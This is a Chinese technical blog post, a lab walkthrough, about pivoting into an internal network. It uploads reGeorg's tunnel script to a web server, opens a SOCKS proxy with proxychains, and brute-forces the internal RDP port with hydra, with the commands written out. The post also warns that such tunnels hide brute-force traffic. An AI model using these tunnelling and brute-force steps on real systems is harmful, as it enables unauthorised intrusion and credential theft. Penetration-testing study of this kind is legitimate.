reGeorg+Proxchains实现内网穿透(附搭建环境超详细)

最新推荐文章于 2024-06-14 09:54:48 发布
最新推荐文章于 2024-06-14 09:54:48 发布
阅读量2.4k 收藏 7
点赞数 2
分类专栏: SRC工具 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45300786/article/details/111087240
版权

项目地址:https://github.com/sensepost/reGeorg

https://github.com/rofl0r/proxychains-ng

HTTP/HTTPS 协议

HTTP Service代理用于将所有的流量转发到内网。常见的代理工具有reGeorg、meterpreter.tunna等。

reGeorg是reDuh的升级版,主要功能是把内网服务器端口的数据通过HTTP/HTTPS隧道转发到本机,实现基于HTTP协议的通信。reGeorg 脚本的特征非常明显,很多杀毒软件都会对其进行查杀。r

如图所示,reGeorg 支持ASPX、PHP、 JSP等Web脚本,并特别提供了一个TomcatS版本。
在这里插入图片描述

环境配置

在这里插入图片描述

将脚本文件上传到目标服务器中,使用Kai Limux 在本地访问远程服务器上的tunnel.nosocket.php文件。返回后,利用reGcorgSocksProxy.py脚本监听本地的9999端口,即可建立一一个通信链路。输人如下命令,查看本地端口,可以发现9999端口已经开启了,如图所示。

因为我这里的跳板机web服务器是PHP脚本语言,所以选的php文件上传

上传到跳板机上访问这个文件,显示必须是Georg says, 'All seems fine'才表明是可用的!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

在这里插入图片描述

如果选另一个,则是不行的

如果强迫要用tunnel.php这个文件的话,web服务器要tomcat才行(http://localhost:8080/tunnel.php)
在这里插入图片描述
在host上执行命令

python reGeorgSocksProxy.py -p 9999 -u http://192.168.100.12/tunnel.nosocket.php

在这里插入图片描述

隧道正常工作之后,可以在本地Kali Linux机器上使用ProxyChains之类的工具,访向目标内网中的资源。

git clone https://github.com/rofl0r/proxychains-ng
vi /etc/proxychains.conf
socks5  192.168.1.34 9999

在这里插入图片描述
在这里插入图片描述
如果用浏览器的话,设置sock5
在这里插入图片描述
kali访问内网成功
在这里插入图片描述

配置ProxyChains,如图3-83所示。ProxyChains 的使用方法会在后面详细讲解。

传统的Web服务器通常不会将本地的3389端口开放到公网,攻击者的暴力破解行为也很容易被传统的安全设备捕获。但是,如果使用HTTP隧道进行端口转发,不仅攻击者可以直接访问Web服务器的3389端口,而且暴力破解所产生的流量的特征也不明显。因此,在日常网络维护中,需要监控HTTP隧道的情况,及时发现问题。

在本地调用hydra对Web服务器的3389端口进行暴力破解的过程,如图所示。

proxychains hydra -s 3389 -v -l administrator -P /opt/c33/1.txt -t 16 192.168.200.7

总结一下,这个reGeorg

整整花了我一天时间排错
python老是报错,
实际上这个工具不难用,难的是环境配置,
注意查看日志,然后排错
在这里插入图片描述

参考文章
https://blog.csdn.net/weixin_30245867/article/details/98036505
https://www.fujieace.com/penetration-test/regeorg-proxifier.html
https://bbs.ichunqiu.com/thread-12514-1-1.html

樱浅沐冰
关注
  • 2
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网穿透--proxychains项目(支持Linux)
金灰的博客
06-04 645
免责声明:本文仅做技术交流与学习...代理技术:c/s服务端和客户端 缺一不可.服务端:外网服务器(cs服务端)客户端:本地kali。
reGeorg+proxychains-ng组合试用
weixin_30426879的博客
08-02 239
之前有分享过LCX端口转发工具及修改的可以在32位和64位Windows运行的源码。这次,我再来试用下reGeorgproxychains-ng。在渗透测试过程中,可以利用它们的组合来完成从外网到内网的通信。 reGeorg是reDuh的继承者。主要是把内网服务器的端口通过http/https隧道转发到本机,形成一个回路。用于目标服务器在内网或做了端口策略的情况下连...
reGeorg隐秘隧道搭建
最新发布
m0_74540090的博客
06-14 669
在内网渗透中,由于防火墙的存在,导致无法对内网直接发起连接,因此就需要端口转发,如果进一步对内网其他主机进行渗透,就需要通过内网代理,才能对其他主机进行渗透。键的同时单击鼠标右键,选中快捷菜单的【在此处打开命令窗口】,进入命令窗口,执行命令。的流量经过代理发向内网主机,通过这种方式成功连接内网主机的远程桌面。,,单击【确定】按钮,如图所示,验证提示框单击【是。】按钮,如图所示,登录内网主机远程桌面,成功登。】按钮,添加代理规则,规则设置如图所示,选中。,访问服务器搭建的网站,页面回显如图所示。
内网转发之reGeorg结合proxychains代理链(HTTP隧道)
来到了学渣的博客
05-26 2689
reGeorg和端口转发是什么 reGeorg是用 python 写的利用Web进行代理的工具,流量只通过 http 传输,也就是http隧道。 内网端口转发主要是把内网服务器的端口通过http/https隧道转发到本机,形成一个回路。用于目标服务器在内网或做了端口策略的情况下连接目标服务器内部开放端口。 比如说攻击机拿下win7主机的一个web服务器权限,探测到内网存在其他的机器。所以要用内网转发的一些技术,使得我们自己的攻击机可以直接访问与操作内网中的其他机器。 配置一个简单的内网环境 Win10
【工具使用】reGeorg+Proxifier实现内网穿透
做自己喜欢的事,并将其发挥到极致!
01-13 7645
文章目录前言一、工具介绍二、正向代理和反向代理三、工具下载和配置四、reGeorg使用方法五、应用场景六、reGeorg+proxychains代理Linux内网 前言 在内网环境中,使用一些常规的内网反弹工具均被各大安全软件所拦截,尝试提权但无果,这时就需要一款内网代理和端口转发工具,穿越防火墙直连内网。 本文皆在学习内网渗透中 reGeorg+Proxifier 工具的使用。 一、工具介绍 reGeorg是reDuh的继承者,利用了会话层的socks5协议,而Proxifier是一款强大的sock.
内网渗透_linux_socks代理_reGeorg+proxychains
weixin_30823227的博客
02-15 663
过程演示 测试前提是目标服务器已经getshell。 1.将 reGeorgSocksProxy 中的 tunnel.jsp 文件放置到目标服务器web目录,查看能否正常访问(如图)。 2.设置kali的proxychains代理地址和端口(通过本地的socks5 2333端口出去) vi /etc/proxychains.conf 3.配置好后通过 reGeory 来打通本地和目标...
proxychains 安装和proxychains 代理nmap
qq_53086690的博客
12-07 7217
目录1.下载源码2.编译安装3. 配置proxychains 1.下载源码 首先我们要从github上把源码拉取到本地 git clone https://github.com/haad/proxychains.git 2.编译安装 cd proxychains ./configure make sudo make install 如果出现make: cc: Command not found错误 这是由于安装的Linux系统没有安装gcc环境,需要安装gcc yum install gcc 3. 配置p
frp+nginx实现内网穿透,多个tomcat共用80
12-05
frp+nginx实现内网穿透,多个tomcat共用80,配备详细说明文档,可自行查看。看不懂可以留言
基于appnode搭建网络存储并实现内网穿透.doc
05-26
基于 AppNode 搭建网络存储并实现内网穿透 在这篇文章中,我们将讨论如何使用 AppNode 搭建网络存储,并实现内网穿透。我们将从头开始,安装 AppNode,配置 AppNode,部署 Kod,实现公网访问,并解决遇到的问题。 ...
n2nguien 内网穿透搭建虚拟局域网工具windows 客户端
04-15
n2n实现内网穿透搭建虚拟局域网 n2n 跟 Ze­rotier 相类似,然而 Ze­rotier 的设置方面更容易些,但稳定性取决于官方的服务器,由于国内的互联网环境,Ze­rotier 经常掉线。n2n 虽然设置起来麻烦一些,但稳定性...
reGeorg内网穿透工具
07-07
reGeorg内网穿透工具
内网穿透客户端无需要扩展版源码.zip_PHP 穿透内网_obtainpyb_php_php实现内网穿透_穿透
07-15
内网穿透技术是一种允许外部网络访问位于内网中的服务或设备的方法,对于远程访问本地开发环境、测试服务器或者智能家居等场景非常有用。标题提到的是一个基于PHP实现内网穿透客户端源码,无需额外扩展,简化了...
proxychains4配置使用
热门推荐
weixin_30470643的博客
09-25 2万+
一丶安装  sudo apt-get install proxychains4  二丶修改配置文件 sudo vim /etc/proxychains.conf 在文本最后加上你的代理服务器地址,如果有用户名和密码也加上。 #各配置项用法如下:#dynamic_chain:#每个连接都将通过链接代理完成#所有代理按列表中显示的顺序链接#至...
ProxyChains
weixin_33725239的博客
04-21 580
From:https://qiaohong.org/2016/12/15/proxychains-%E4%B8%8A%E6%89%8B%E6%94%BB%E7%95%A5/ ProxyChains 是一个强制应用的 TCP 连接通过代理的工具,支持 Tor、HTTP、与 Socks 代理。与sshuttle不同的是,ProxyChains ...
双内网渗透代理之reGeorg+Proxifier
0xclude
08-04 1万+
昨天友情检测了一下学校某网站,一开始就发现一个sql注入,这里就不详细介绍sql注入详细过程了,很常规的一个思路,通过页面报错得到是用wamp搭建的站,mysql为root权限,读到配置文件,得到网站的根目录,写下马,菜刀连之,发现是system 权限,而且3389端口开放。 这时候出现了问题,外网访问3389端口的时候,发现连接不上,只对内网开放。这就很尴尬了,我在内网中,服务器也在内网中
利用proxychains在终端使用socks5代理
WHACKW的专栏
07-04 2706
1.proxychains安装 1 2 3 4 5 6 git clone https://github.com/rofl0r/proxychains-ng.git cd proxychains-ng ./configure make && make install cp ./src/proxychains.conf /etc/proxychains.conf cd
使用Neo-reGeorg 搭建socks5隧道 解决代理无法在其他主机使用问题
a_153161的博客
06-08 868
解决Neo-reGeorg的代理无法给其他主机使用
Ubuntu安装Proxychains4
冷饮
09-12 8958
平时在使用github的时候,偶尔发现无法Clone仓库,此时就需要用特别的上网的方式解决。 一、安装proxychains4 sudo apt-get install proxychains4 *注意:国内某些软件源没有此应用,请先行切换到其他软件源。 二、配置proxychains4.conf sudo vim /etc/proxychains4.conf 如图增...
内网穿透工具Neo-reGeorg的测试
imtech的博客
02-03 2994
Neo-reGeorg 隧道 反向代理 http代理
ubuntu++frp内网穿透
01-28
在Ubuntu系统上使用Frp进行内网穿透的步骤如下: 1. 在云服务器上安装Frp - 打开终端,使用以下命令安装Frp: ```shell sudo apt-get update sudo apt-get install unzip wget https://github.com/fatedier/frp/releases/download/v0.37.1/frp_0.37.1_linux_amd64.tar.gz tar -zxvf frp_0.37.1_linux_amd64.tar.gz cd frp_0.37.1_linux_amd64 ``` - 编辑Frp配置文件: ```shell sudo nano frps.ini ``` - 在配置文件中,配置以下内容: ```ini [common] bind_port = 7000 vhost_http_port = 80 ``` - 保存并退出配置文件。 2. 在内网服务器上安装Frp - 打开终端,使用以下命令安装Frp: ```shell sudo apt-get update sudo apt-get install unzip wget https://github.com/fatedier/frp/releases/download/v0.37.1/frp_0.37.1_linux_amd64.tar.gz tar -zxvf frp_0.37.1_linux_amd64.tar.gz cd frp_0.37.1_linux_amd64 ``` - 编辑Frp配置文件: ```shell sudo nano frpc.ini ``` - 在配置文件中,配置以下内容: ```ini [common] server_addr = <云服务器公网IP> server_port = 7000 [web] type = http local_ip = 127.0.0.1 local_port = 80 ``` - 保存并退出配置文件。 3. 启动Frp服务 - 在云服务器上,使用以下命令启动Frp服务: ```shell ./frps -c frps.ini ``` - 在内网服务器上,使用以下命令启动Frp服务: ```shell ./frpc -c frpc.ini ``` 4. 验证内网穿透 - 在浏览器中访问云服务器的公网IP,即可访问内网服务器上的网站。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值